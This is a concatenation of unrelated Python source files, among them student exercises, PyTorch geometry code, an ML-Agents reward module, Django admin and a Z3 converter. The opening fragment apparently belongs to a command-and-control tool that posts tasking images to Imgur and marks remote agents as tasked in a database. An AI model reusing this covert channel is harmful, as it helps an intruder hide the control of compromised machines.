requests.post(url, headers=headers, files=files) response = r.content response = json.loads(response.decode()) upload_id = response.get('data', {}).get('id') upload_deletehash = response.get('data', {}).get('deletehash') if r.status_code == 200: print("\nImage uploaded successfully with Image-ID: " + Style.BRIGHT + Fore.YELLOW + str(upload_id) + Style.RESET_ALL + ", Delete-hash: " + Style.BRIGHT + Fore.YELLOW + str(upload_deletehash) + Style.RESET_ALL) else: print("\nImage failed to upload, printing response...\n") print(response) return url = 'https://api.imgur.com/3/gallery/image/' + upload_id headers = {'Authorization': 'Bearer ' + token} upload_title = title upload_tags = tags files = {'title': (None, upload_title), 'tags': (None, upload_tags)} r = requests.post(url, headers=headers, files=files) if r.status_code == 200: print("Image sent to Gallery successfully with Title: " + Style.BRIGHT + Fore.YELLOW + upload_title 
+ Style.RESET_ALL + "\n") print("\n") else: print("\nImage failed to send to Gallery, printing response...\n") response = r.content response = json.loads(response.decode()) print(response) return mycursor = mydb.cursor() execution = "INSERT INTO Tasking (Title, Tags, Tasking_Image, Agent, Response, Image_Hash, Delete_Hash, Token) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)" response = "PENDING" values = (title, tags, task_image, agent_id, response, upload_id, upload_deletehash, token) mycursor.execute(execution, values) mydb.commit() execution = "SELECT command FROM Pictures WHERE ID = {0}".format(task_image) mycursor.execute(execution) command_tuple = mycursor.fetchall() command = command_tuple[0][0] execution = "UPDATE Tasking SET Tasking_Command = '{0}' WHERE Tasking_Image = {1}".format(command,task_image) mycursor.execute(execution) mydb.commit() status = 'TASKED' execution = "UPDATE Agents SET Status = '{0}' WHERE ID = {1}".format(status,agent_id) mycursor.execute(execution) mydb.commit() mycursor.close() def print_valid_commands(self): print('\nValid Commands:') print('Set <option> <option-value>') print('Options/Show Options') print('Reset/Reset Options') print('Go') print('Exit/Quit\n') ascii() mydb = mysql_check() p = MyPrompt() p.cmdloop()
python
""" Assignment 1 create 5 variable for each data type 2 create 5 list variable with 3 elements like name,address,contact number """ # Int Data a = 5 print(a) b = 3 print(b) c = 8 print(c) d = 7 print(d) e = 6 print(e) # Float Data a = 0.5 print(a) b = 3.9 print(b) c = 8.4 print(c) d = 7.2 print(d) e = 6.9 print(e) e=int(e) print(e) # String Data a = "Pallavi" print(a) b = "Samrthview" print(b) c = "Python" print(c) d = "Assignment" print(d) e = "Class" print(e) # None A = None print(A,type(A)) B = None print(A,type(B)) C = None print(C,type(C)) D = None print(D,type(D)) E = None print(E,type(E)) # Boolean A = True print(A) B = False print(B) # List List1 = ["Pallavi", "Tanish Samruddhi" ,12345] print(List1) List2 = ["Sonali","Dighe",1,45,"Python"] print(List2) List3 = ["Somal","Home",1452,3.5,6.5] print(List3) List4 = ["Samarthview","Python","Batch","January",2019] print(List4) List5 = ["New","Python","Batch","class","Assignment",1] print(List5) print(List5[2]) print(List1+List2) print(List1*3) List6 = ["Python",["Samrthvieew",1,2],["Pallavi",["Sonali",["Dighe",[123]]]]] print(List6) print(List6[2][1][1][1][0])
python
dia=int(input("quantos dia alugados")) km=float(input("quantos km rodado")) pago=(dia*60)+(km*0.15) print("o total a pagar e de R${:.2f}".format(pago))
python
""" Base class for records. """ from abc import ABCMeta, abstractmethod from .utils import set_encoded class InserterRegistry(object): """ Registry of inserters. """ def __init__(self): self._inserters = [] self._register_inserters() def _register_inserters(self): """ Register all inserters. """ from itertools import chain import sdafile.numeric_inserter as numeric import sdafile.logical_inserter as logical import sdafile.character_inserter as character import sdafile.cell_inserter as cell import sdafile.structure_inserter as structure import sdafile.file_inserter as file_ objs = chain( numeric.__dict__.values(), logical.__dict__.values(), character.__dict__.values(), cell.__dict__.values(), structure.__dict__.values(), file_.__dict__.values(), ) inserters = [] for obj in objs: if getattr(obj, '__inserter__', False): inserters.append(obj) self._inserters = inserters def get_inserter(self, data): """" Get the inserter appropriate for the passed data. This loops through available inserters and uses the first one it encounters that can insert the data. Parameters ---------- data : Data to be inserted into an archive Returns ------- inserter : RecordInserter or None The RecordInserter *class* that can insert the data into an archive, or None if no such inserter can be found. """ for cls in self._inserters: if cls.can_insert(data): return cls return None def inserter(cls): """ Mark a class as an inserter. """ cls.__inserter__ = True return cls class RecordInserter(object): """ Stores a record for insertion. """ __metaclass__ = ABCMeta # The record type supported by the inserter record_type = None def __init__(self, label, data, deflate, registry=None): self.label = label self.deflate = int(deflate) self.data = self.original_data = data self.empty = 'no' self._registry = registry @property def registry(self): if self._registry is None: self._registry = InserterRegistry() return self._registry @staticmethod @abstractmethod def can_insert(data): """ Indicates if the Record can insert the passed data. This is to be overloaded by derived classes """ return False @abstractmethod def prepare_data(data): """ Prepare data for writing and record metadata. This is to be overloaded by derived classes. This is reponsible for recording metadata to be written by ``record_group_attributes`` and ``record_dataset_attributes``. """ return def record_group_attributes(self, dict_like): """ Record group attributes specific to the data. This includes all group-level data except 'Description'. """ set_encoded( dict_like, RecordType=self.record_type, Empty=self.empty, Deflate=self.deflate, ) @abstractmethod def insert(self, h5file, description): """ Insert the data into an h5py File. """ return @abstractmethod def insert_into_group(self, group): """ Insert data at the group level """ return class SimpleRecordInserter(RecordInserter): """ RecordInserter for simple objects. Subclasses must convert ``data`` to an ndarray. """ def insert(self, h5file, description): """ Insert the data into an h5py File. """ group = h5file.create_group(self.label) set_encoded( group.attrs, Description=description, ) self.insert_into_group(group) def insert_into_group(self, group): """ Insert at the group level """ self.prepare_data() self.record_group_attributes(group.attrs) self.insert_below_group(group) def insert_below_group(self, group): """ Insert below a group, creating the necessary dataset entry. 
""" maxshape = (None,) * self.data.ndim ds = group.create_dataset( self.label, maxshape=maxshape, data=self.data, compression=self.deflate, ) self.record_dataset_attributes(ds.attrs) def record_dataset_attributes(self, dict_like): """ Record the dataset attributes specific to the data. """ set_encoded( dict_like, RecordType=self.record_type, Empty=self.empty, ) class CompositeRecordInserter(RecordInserter): """ RecordInserter for composite objects. """ @abstractmethod def __iter__(self): """ Yield RecordInserter instances for subitems. """ return def record_dataset_attributes(self, dataset_attrs): """ CompositeRecordInserters do not record to datasets. """ return def insert(self, h5file, description): """ Insert the data into an h5py File. """ group = h5file.create_group(self.label) set_encoded( group.attrs, Description=description, ) self.insert_into_group(group) def insert_into_group(self, group): """ Insert at the group level """ self.prepare_data() self.record_group_attributes(group.attrs) for inserter in self: if isinstance(inserter, CompositeRecordInserter): # Sub-composites get their own new groups sub_group = group.create_group(inserter.label) inserter.insert_into_group(sub_group) else: # Simple data inserts below the composite group inserter.prepare_data() inserter.insert_below_group(group)
python
import torch import numpy as np from torch.nn import functional as F def create_uv(width, height): uv = np.flip(np.mgrid[height[0]:height[1], width[0]:width[1]].astype(np.int32), axis=0).copy() return uv.reshape((2, -1)).T def create_perpendicular_vectors_vectorized(normals): # Nx3 tensor def handle_zeros(n_vec): row_inds = torch.arange(n_vec.shape[0], device=normals.device, dtype=torch.long) max_inds = torch.abs(n_vec).argmax(dim=-1, keepdim=True) zero_inds = torch.arange(3, device=normals.device, dtype=torch.long).view(1, 3).repeat(n_vec.shape[0], 1) zero_inds = zero_inds[torch.where(zero_inds != max_inds)].view(n_vec.shape[0], -1) vec_x, vec_y = torch.zeros_like(n_vec), torch.zeros_like(n_vec) vec_x[row_inds, zero_inds[:, 0]] = 1 vec_y[row_inds, zero_inds[:, 1]] = 1 return vec_x, vec_y def handle_nonzeros(n_vec): row_inds = torch.arange(n_vec.shape[0], device=normals.device, dtype=torch.long) vec = torch.zeros_like(n_vec) max_ind = torch.abs(n_vec).argmax(dim=-1) vec[row_inds, max_ind] = n_vec[row_inds, max_ind] vec_x = torch.cross(vec, n_vec, dim=-1) vec_y = torch.cross(vec_x, n_vec, dim=-1) vec_y = F.normalize(vec_y, dim=-1) vec_x = F.normalize(vec_x, dim=-1) return vec_x, vec_y vec_x = torch.empty_like(normals) vec_y = torch.empty_like(normals) zero_inds = (normals == 0).sum(axis=-1) == 2 non_zero_inds = ~zero_inds if zero_inds.any(): vec_x[zero_inds], vec_y[zero_inds] = handle_zeros(normals[zero_inds]) if non_zero_inds.any(): vec_x[non_zero_inds], vec_y[non_zero_inds] = handle_nonzeros(normals[non_zero_inds]) return vec_x, vec_y def plane_points_to_3d_vectorized(normal_vec, local_coords, dhw): assert normal_vec.shape[0] == local_coords.shape[0] == dhw.shape[0] assert normal_vec.shape[1] == dhw.shape[1] == 3 and local_coords.shape[1] == 2 vec_d, vec_w = create_perpendicular_vectors_vectorized(normal_vec) T_inv = torch.cat((vec_d, normal_vec, vec_w), dim=-1).view(-1, 3, 3) # vectors are rows points2D = torch.cat(( local_coords, torch.zeros((local_coords.shape[0], 1), dtype=local_coords.dtype, device=local_coords.device)), dim=1) points2D = torch.stack((points2D[:, 1], points2D[:, 2], points2D[:, 0])).t() # xyz -> dhw space points3D = torch.matmul(points2D.unsqueeze(1), T_inv).squeeze() + dhw return points3D def trilinear_interpolation(points, grid): dhw_inds, interpolation_weights = add_trilinear_neigh_points(points) interpolated_values = \ grid[dhw_inds[..., 0].reshape(-1), dhw_inds[..., 1].reshape(-1), dhw_inds[..., 2].reshape(-1)] * interpolation_weights.view(-1, 1) interpolated_values = interpolated_values.view(-1, 8, grid.shape[-1]).sum(1) return interpolated_values def add_trilinear_neigh_points(xyz): """ Add neighbouring points. 
The first point is central Args: xyz (torch.Tensor): query points in the grid space (-1, 3) Returns: dhw inds (np.ndarray): grid points (-1, 8, 3) dhw weights (np.ndarray): grid points (-1, 8, 1) """ # new code points = xyz # get indices indices = torch.floor(points) # compute interpolation distance df = torch.abs(points - indices) # get interpolation indices xx, yy, zz = torch.meshgrid([torch.arange(0, 2), torch.arange(0, 2), torch.arange(0, 2)]) xx = xx.contiguous().view(8) yy = yy.contiguous().view(8) zz = zz.contiguous().view(8) shift = torch.stack([xx, yy, zz], dim=1) shift = shift.to(points.device) # reshape shift = shift.unsqueeze_(0) indices = indices.unsqueeze_(1) # compute indices indices = indices + shift # init weights weights = torch.zeros_like(indices).sum(dim=-1) # compute weights weights[:, 0] = (1 - df[:, 0]) * (1 - df[:, 1]) * (1 - df[:, 2]) weights[:, 1] = (1 - df[:, 0]) * (1 - df[:, 1]) * df[:, 2] weights[:, 2] = (1 - df[:, 0]) * df[:, 1] * (1 - df[:, 2]) weights[:, 3] = (1 - df[:, 0]) * df[:, 1] * df[:, 2] weights[:, 4] = df[:, 0] * (1 - df[:, 1]) * (1 - df[:, 2]) weights[:, 5] = df[:, 0] * (1 - df[:, 1]) * df[:, 2] weights[:, 6] = df[:, 0] * df[:, 1] * (1 - df[:, 2]) weights[:, 7] = df[:, 0] * df[:, 1] * df[:, 2] weights = weights.unsqueeze_(-1) return indices.view(-1, 8, 3).long(), weights.float().view(-1, 8, 1) def find_iso_surface(points, directions, sdf_grid, geometry_upsampling_factor=1, normal_marching=False): # S3 points are in [0, 1] space mask = torch.zeros(points.shape[0], dtype=torch.bool, device=points.device) if len(sdf_grid.shape) == 3: sdf_grid = sdf_grid.unsqueeze(-1) max_step = 4 # / max(sdf_grid.shape) original_points = points.clone() while True: sdfs = trilinear_interpolation(points * geometry_upsampling_factor, sdf_grid).view(-1) inds = (torch.abs(sdfs) > 1e-5) & (torch.abs(points - original_points) <= max_step).all(-1) mask = mask | ~inds if mask.all(): break points[inds] += sdfs[inds].view(-1, 1) * directions[inds] if not normal_marching: return points return points def get_patch_coordinates(patch_resolution, patch_size): puv = create_uv(width=(0, patch_resolution), height=(0, patch_resolution)) puv_coords = ((puv + 0.5) / patch_resolution - 0.5) * patch_size return torch.from_numpy(puv_coords).to(dtype=torch.float32) def shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor=1, prev_directions=None): directions = -trilinear_interpolation(points * geometry_upsampling_factor, normal_grid) directions = F.normalize(directions, dim=-1) if prev_directions is not None: inds_to_overwrite = torch.where((directions == 0).all(-1)) directions[inds_to_overwrite] = prev_directions[inds_to_overwrite] points = find_iso_surface(points, directions, sdf_grid, geometry_upsampling_factor) return points, directions def surfel_locations(dhw_inds, sdf_grid, normal_grid, voxel_size, patch_resolution, patch_size, geometry_upsampling_factor): # [0, 1] space n_shifts = num_divisible_by_2(patch_resolution) patch_resolution_list = [2 for _ in range(n_shifts)] if int(patch_resolution / 2 ** n_shifts) != 1: patch_resolution_list = patch_resolution_list + [int(patch_resolution / 2 ** n_shifts)] patch_size_list = [patch_size / (2 ** i) for i in range(len(patch_resolution_list))] d_inds, h_inds, w_inds = dhw_inds[0].long(), dhw_inds[1].long(), dhw_inds[2].long() points = voxel_size * torch.stack((d_inds, h_inds, w_inds)).t().float() # S3 voxel_centers = points.detach().clone() points, dirs = shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor) 
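    # each pass below splits every patch into a finer grid of surfels, spreads the
    # new surfels over the tangent plane of their parent point, then marches them
    # back onto the SDF zero level-set along the (negated) normal direction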
for i in range(len(patch_resolution_list)): # subdivide patch puv_coords = get_patch_coordinates(patch_resolution_list[i], patch_size_list[i]).repeat(points.shape[0], 1) points = points.repeat_interleave(patch_resolution_list[i] ** 2, dim=0).view(-1, 3) # (S4)3 dirs = dirs.repeat_interleave(patch_resolution_list[i] ** 2, dim=0).view(-1, 3) # (S4)3 points = plane_points_to_3d_vectorized(dirs, puv_coords, points) # (ST)3 points, dirs = shift_points(points, sdf_grid, normal_grid, geometry_upsampling_factor, dirs) # remove points that are outside their voxel cells voxel_centers = voxel_centers.repeat_interleave(patch_resolution ** 2, dim=0).view(-1, 3) shifted_points = torch.abs(voxel_centers - points).max(dim=-1)[0] outside_voxel_inds = shifted_points > voxel_size * 1 directions = -dirs directions[outside_voxel_inds] = 0 points[outside_voxel_inds] = float('inf') return points, directions def surfel_default_locations(dhw_inds, voxel_size, patch_resolution, patch_size): d_inds, h_inds, w_inds = dhw_inds[0].long(), dhw_inds[1].long(), dhw_inds[2].long() points = voxel_size * torch.stack((d_inds, h_inds, w_inds)).t().float() # S3 puv_coords = get_patch_coordinates(patch_resolution, patch_size).repeat(points.shape[0], 1) points = points.repeat_interleave(patch_resolution ** 2, dim=0).view(-1, 3) # (S4)3 dirs = torch.ones_like(points) # (S4)3 dirs = F.normalize(dirs, dim=-1) points = plane_points_to_3d_vectorized(dirs, puv_coords, points) # (ST)3 return points, dirs def num_divisible_by_2(number): i = 0 while not number % 2: number = number // 2 i += 1 return i def inv_extrinsics(extrinsics): assert type(extrinsics) == np.ndarray or torch.is_tensor(extrinsics) if torch.is_tensor(extrinsics): cam2world = torch.eye(4) cam2world[:3, :3] = extrinsics[:3, :3].t() cam2world[:3, 3] = torch.matmul(extrinsics[:3, :3].t(), -extrinsics[:3, 3]).reshape(-1) else: cam2world = np.eye(4) cam2world[:3, :3] = extrinsics[:3, :3].T cam2world[:3, 3] = np.matmul(extrinsics[:3, :3].T, -extrinsics[:3, 3]).reshape(-1) return cam2world def inv_cam2world(cam2world): assert type(cam2world) == np.ndarray or torch.is_tensor(cam2world) if torch.is_tensor(cam2world): extrinsics = torch.eye(4) extrinsics[:3, :3] = cam2world[:3, :3].t() extrinsics[:3, 3] = torch.matmul(extrinsics[:3, :3], -cam2world[:3, 3]).reshape(-1) else: # numpy extrinsics = np.eye(4) extrinsics[:3, :3] = cam2world[:3, :3].T extrinsics[:3, 3] = np.matmul(extrinsics[:3, :3], -cam2world[:3, 3]).reshape(-1) return extrinsics def sdf2normal_grid(sdf): normal_grid = np.zeros((*sdf.shape, 3), dtype=np.float32) d_diff = sdf[2:, :, :] - sdf[:-2, :, :] h_diff = sdf[:, 2:, :] - sdf[:, :-2, :] w_diff = sdf[:, :, 2:] - sdf[:, :, :-2] normal_grid[1:-1, :, :, 0] = d_diff normal_grid[:, 1:-1, :, 1] = h_diff normal_grid[:, :, 1:-1, 2] = w_diff norm = np.linalg.norm(normal_grid, axis=-1) inds = norm != 0 normal_grid[inds] = normal_grid[inds] / norm[inds, None] return normal_grid
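
# note: sdf2normal_grid() approximates the SDF gradient with central differences
# (sdf[i+1] - sdf[i-1]) along each of the d/h/w axes and normalises it per voxel;
# the outermost voxels are left with zero normals.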
python
import numpy as np import matplotlib.pyplot as plt import IPython from mm2d.model import ThreeInputModel # model parameters # link lengths L1 = 1 L2 = 1 # input bounds LB = -1 UB = 1 def pseudoinverse(J): JJT = J.dot(J.T) return J.T.dot(np.linalg.inv(JJT)) def weighted_ps(D, J): A = np.diag(D) return pseudoinverse(A @ J) @ A def main(): model = ThreeInputModel(L1, L2, LB, UB, output_idx=[0, 1]) v = np.array([0.5, 0.5]) q = np.array([0, 0.25*np.pi, -0.5*np.pi]) J = model.jacobian(q) Jps = pseudoinverse(J) IPython.embed() if __name__ == '__main__': main()
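
# pseudoinverse() above is the right (minimum-norm) pseudo-inverse J^T (J J^T)^-1,
# which assumes the Jacobian has full row rank; weighted_ps(D, J) returns
# pinv(diag(D) @ J) @ diag(D), i.e. the same formula applied to a row-weighted
# Jacobian, with the weights also applied to whatever velocity the result
# multiplies.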
python
import unittest from bitmovin import Bitmovin from tests.utils import get_settings class BitmovinTests(unittest.TestCase): @classmethod def setUpClass(cls): super().setUpClass() @classmethod def tearDownClass(cls): super().tearDownClass() def setUp(self): super().setUp() self.settings = get_settings() if not self.settings or not isinstance(self.settings, dict): raise Exception('Unable to load settings') self.api_key = self.settings.get('apiKey') if not self.api_key or not isinstance(self.api_key, str): raise Exception('Unable to load apiKey from settings') def tearDown(self): super().tearDown() def test_init(self): bitmovin = Bitmovin(self.api_key) self.assertIsNotNone(bitmovin) self.assertTrue(isinstance(bitmovin, Bitmovin)) if __name__ == '__main__': unittest.main()
python
import numpy as np from typing import Dict from mlagents.torch_utils import torch from mlagents.trainers.buffer import AgentBuffer from mlagents.trainers.torch.components.reward_providers.base_reward_provider import ( BaseRewardProvider, ) from mlagents.trainers.settings import RNDSettings from mlagents_envs.base_env import BehaviorSpec from mlagents.trainers.torch.utils import ModelUtils from mlagents.trainers.torch.networks import NetworkBody from mlagents.trainers.settings import NetworkSettings, EncoderType from mlagents.trainers.trajectory import ObsUtil class RNDRewardProvider(BaseRewardProvider): """ Implementation of Random Network Distillation : https://arxiv.org/pdf/1810.12894.pdf """ def __init__(self, specs: BehaviorSpec, settings: RNDSettings) -> None: super().__init__(specs, settings) self._ignore_done = True self._random_network = RNDNetwork(specs, settings) self._training_network = RNDNetwork(specs, settings) self.optimizer = torch.optim.Adam( self._training_network.parameters(), lr=settings.learning_rate ) def evaluate(self, mini_batch: AgentBuffer) -> np.ndarray: with torch.no_grad(): target = self._random_network(mini_batch) prediction = self._training_network(mini_batch) rewards = torch.sum((prediction - target) ** 2, dim=1) return rewards.detach().cpu().numpy() def update(self, mini_batch: AgentBuffer) -> Dict[str, np.ndarray]: with torch.no_grad(): target = self._random_network(mini_batch) prediction = self._training_network(mini_batch) loss = torch.mean(torch.sum((prediction - target) ** 2, dim=1)) self.optimizer.zero_grad() loss.backward() self.optimizer.step() return {"Losses/RND Loss": loss.detach().cpu().numpy()} def get_modules(self): return { f"Module:{self.name}-pred": self._training_network, f"Module:{self.name}-target": self._random_network, } class RNDNetwork(torch.nn.Module): EPSILON = 1e-10 def __init__(self, specs: BehaviorSpec, settings: RNDSettings) -> None: super().__init__() state_encoder_settings = NetworkSettings( normalize=True, hidden_units=settings.encoding_size, num_layers=3, vis_encode_type=EncoderType.SIMPLE, memory=None, ) self._encoder = NetworkBody(specs.sensor_specs, state_encoder_settings) def forward(self, mini_batch: AgentBuffer) -> torch.Tensor: n_obs = len(self._encoder.processors) np_obs = ObsUtil.from_buffer(mini_batch, n_obs) # Convert to tensors tensor_obs = [ModelUtils.list_to_tensor(obs) for obs in np_obs] hidden, _ = self._encoder.forward(tensor_obs) self._encoder.update_normalization(mini_batch) return hidden
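
# intuition: the target network is randomly initialised and never trained, the
# predictor is trained to match it on visited observations, and the per-step
# reward is their squared prediction gap -- large for novel states, shrinking as
# states are revisited (see the RND paper linked in the class docstring).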
python
from django.contrib import admin from .models import Author, Category, Article, Comment # Register your models here. class AuthorModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__", "details"] class Meta: Model = Author admin.site.register(Author, AuthorModel) class ArticleModel(admin.ModelAdmin): list_display = ["__str__", "posted_on"] search_fields = ["__str__", "details"] list_per_page = 10 list_filter = ["posted_on", "category"] class Meta: Model = Article admin.site.register(Article, ArticleModel) class CategoryModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__"] list_per_page = 10 class Meta: Model = Category admin.site.register(Category, CategoryModel) class CommentModel(admin.ModelAdmin): list_display = ["__str__"] search_fields = ["__str__"] list_per_page = 10 class Meta: Model = Comment admin.site.register(Comment, CommentModel)
python
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections from typing import Union from ._sodium import ffi ByteLike = Union[ffi.CData, collections.abc.ByteString] def as_array(data: ByteLike) -> ffi.CData: """Convert a bytes-like object into an FFI-array. Args: data: An object that can convert to a list of integers. If an FFI array is passed, it will be returned as is. Returns: An FFI `CData` array with the given value. """ if isinstance(data, ffi.CData): return data array = ffi.new("unsigned char[]", list(data)) return array
python
"""tipo_hilo_cuerda Revision ID: 014 Revises: 013 Create Date: 2014-05-28 07:36:03.329028 """ # revision identifiers, used by Alembic. revision = '014' down_revision = '013' import inspect import imp import os from alembic import op def upgrade(): utils_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), '..', 'utils.py') utils = imp.load_source('', utils_path) utils.create_categoric_table('tipo_hilo_cuerda', [ 'Fast Flight', 'BYC 55', 'DynaFlight', 'BYC 452X', 'B-50', 'D-75', ]) def downgrade(): op.drop_table('tipo_hilo_cuerda')
python
''' This file contains functions that help calculate the score and check word validity in the game. ''' #################################### # Global Variables #################################### WORDLENGTH = 4 #################################### # Cows and Bulls Counter #################################### def returnCowsAndBulls(guess, target): bullCount, cowCount = 0, 0 # Iterate through the guess for i in range(WORDLENGTH): if guess[i] == target[i]: bullCount += 1 elif guess[i] in target: cowCount += 1 return (bullCount == WORDLENGTH, cowCount, bullCount) #################################### # Formatted Score Tuple #################################### def getCowsAndBulls(data): if data.mode == "ai" and data.player == 0 and data.stage == 1: score = [ "_" if animal == None else animal for animal in data.pvcScore] else: if data.guesses == []: score = ("??", "??") else: score = (str(data.guesses[-1][1]), str(data.guesses[-1][2])) return score #################################### # Word Validity #################################### def wordContainsRepeats(word): letterCount = 0 for c in word: if c != None: letterCount += 1 wordSet = set(word) wordSet.discard(None) return letterCount != len(wordSet)
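
# worked example: returnCowsAndBulls("1234", "1243") -> (False, 2, 2) -- '1' and
# '2' are in place (2 bulls), '3' and '4' are present but misplaced (2 cows), and
# the guess is not an exact match.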
python
import sys sys.path.append("/Users/zhouxuerong/projects/autotest/autotest/autotest") from django.test import TestCase from apitest.views import Login from django.http import HttpRequest class titlePageTest(TestCase): def test_loginPage(self): request = HttpRequest() Response = Login(request) print(Response.content)
python
# -*- coding: utf-8 -*- def main(): s = input() if s == 'Sunny': print('Cloudy') elif s == 'Cloudy': print('Rainy') else: print('Sunny') if __name__ == '__main__': main()
python
from sqlalchemy import MetaData from sqlalchemy.ext.declarative import declarative_base metadata = MetaData() Base = declarative_base(metadata=metadata) from . import Assignment, Driver, DriverAssignment, Location, LocationPair, MergeAddress, RevenueRate, Trip
python
#!/usr/bin/python # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Copyright (c) 2012 Michael Hull. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # - Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # - Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------- import numpy as np from morphforge.morphology.core import MorphologyArray from morphforge.morphology.importer.morphologyimporter import MorphologyImporter from StringIO import StringIO from morphforge.morphology.errors import MorphologyImportError from morphforge.morphology.core import MorphologyTree class NewSWCLoader(object): @classmethod def load_swc_single(cls, src, name=None): dtype = {'names': ('id', 'type', 'x', 'y', 'z', 'r', 'pid'), 'formats': ('int32', 'int32', 'f4', 'f4', 'f4', 'f4', 'int32') } swc_data_raw = np.loadtxt(src, dtype=dtype) if len(np.nonzero(swc_data_raw['pid'] == -1)) != 1: assert False, "Unexpected number of id'errstr of -1 in file" # We might not nessesarily have continuous indices in the # SWC file, so lets convert them: index_to_id = swc_data_raw['id'] id_to_index_dict = dict([(_id, index) for (index, _id) in enumerate(index_to_id)]) if len(id_to_index_dict) != len(index_to_id): errstr = "Internal Error Loading SWC: Index and ID map are different lengths." 
errstr += " [ID:%swc_data_raw, Index:%swc_data_raw]" % (len(index_to_id), len(id_to_index_dict)) raise MorphologyImportError(errstr) # Vertices are easy: vertices = swc_data_raw[['x', 'y', 'z', 'r']] vertices = np.vstack([swc_data_raw['x'], swc_data_raw['y'], swc_data_raw['z'], swc_data_raw['r']]).T # Connections need to translate id_to_index: connection_indices = [(id_to_index_dict[ID], id_to_index_dict[parent_id]) for ID, parent_id in swc_data_raw[['id', 'pid']] if parent_id != -1] # Types are specified per connection: section_types = [swctype for ID, swctype, parent_id in swc_data_raw[['id', 'type', 'pid']] if parent_id != -1] return MorphologyArray(vertices=vertices, connectivity=connection_indices, section_types=section_types, dummy_vertex_index=0, name=name) @classmethod def load_swc_set(cls, src): """Naive implementation, that doesn't take account of interleaving of nodes""" lines = [line.strip() for line in src.readlines()] lines = [line for line in lines if line and line[0] != '#'] # Break into sections where we get a new parent: splits = [[]] for line in lines: if int(line.split()[-1]) == -1: splits.append([]) splits[-1].append(line) splits = splits[1:] data_blocks = ['\n'.join(blk) for blk in splits] file_objs = [StringIO(blk) for blk in data_blocks] morphs = [cls.load_swc_single(src=fobj) for fobj in file_objs] return morphs # To Array: MorphologyImporter.register('fromSWC', NewSWCLoader.load_swc_single, as_type=MorphologyArray) # To Tree: def _load_swc_single_tree(*args, **kwargs): return NewSWCLoader.load_swc_single(*args, **kwargs).to_tree() MorphologyImporter.register('fromSWC', _load_swc_single_tree, as_type=MorphologyTree)
python
import utils from symbolic.symbolic_types.symbolic_int import SymbolicInteger from symbolic.symbolic_types.symbolic_type import SymbolicType from z3 import * class Z3Expression(object): def __init__(self): self.z3_vars = {} def toZ3(self,solver,asserts,query): self.z3_vars = {} solver.assert_exprs([self.predToZ3(p,solver) for p in asserts]) solver.assert_exprs(Not(self.predToZ3(query,solver))) def predToZ3(self,pred,solver,env=None): sym_expr = self._astToZ3Expr(pred.symtype,solver,env) if env == None: if not is_bool(sym_expr): sym_expr = sym_expr != self._constant(0,solver) if not pred.result: sym_expr = Not(sym_expr) else: if not pred.result: sym_expr = not sym_expr return sym_expr def getIntVars(self): return [ v[1] for v in self.z3_vars.items() if self._isIntVar(v[1]) ] # ----------- private --------------- def _isIntVar(self, v): raise NotImplementedException def _getIntegerVariable(self,name,solver): if name not in self.z3_vars: self.z3_vars[name] = self._variable(name,solver) return self.z3_vars[name] def _variable(self,name,solver): raise NotImplementedException def _constant(self,v,solver): raise NotImplementedException def _wrapIf(self,e,solver,env): if env == None: return If(e,self._constant(1,solver),self._constant(0,solver)) else: return e # add concrete evaluation to this, to check def _astToZ3Expr(self,expr,solver,env=None): if isinstance(expr, list): op = expr[0] args = [ self._astToZ3Expr(a,solver,env) for a in expr[1:] ] z3_l,z3_r = args[0],args[1] # arithmetical operations if op == "+": return self._add(z3_l, z3_r, solver) elif op == "-": return self._sub(z3_l, z3_r, solver) elif op == "*": return self._mul(z3_l, z3_r, solver) elif op == "//": return self._div(z3_l, z3_r, solver) elif op == "%": return self._mod(z3_l, z3_r, solver) # bitwise elif op == "<<": return self._lsh(z3_l, z3_r, solver) elif op == ">>": return self._rsh(z3_l, z3_r, solver) elif op == "^": return self._xor(z3_l, z3_r, solver) elif op == "|": return self._or(z3_l, z3_r, solver) elif op == "&": return self._and(z3_l, z3_r, solver) # equality gets coerced to integer elif op == "==": return self._wrapIf(z3_l == z3_r,solver,env) elif op == "!=": return self._wrapIf(z3_l != z3_r,solver,env) elif op == "<": return self._wrapIf(z3_l < z3_r,solver,env) elif op == ">": return self._wrapIf(z3_l > z3_r,solver,env) elif op == "<=": return self._wrapIf(z3_l <= z3_r,solver,env) elif op == ">=": return self._wrapIf(z3_l >= z3_r,solver,env) else: utils.crash("Unknown BinOp during conversion from ast to Z3 (expressions): %s" % op) elif isinstance(expr, SymbolicInteger): if expr.isVariable(): if env == None: return 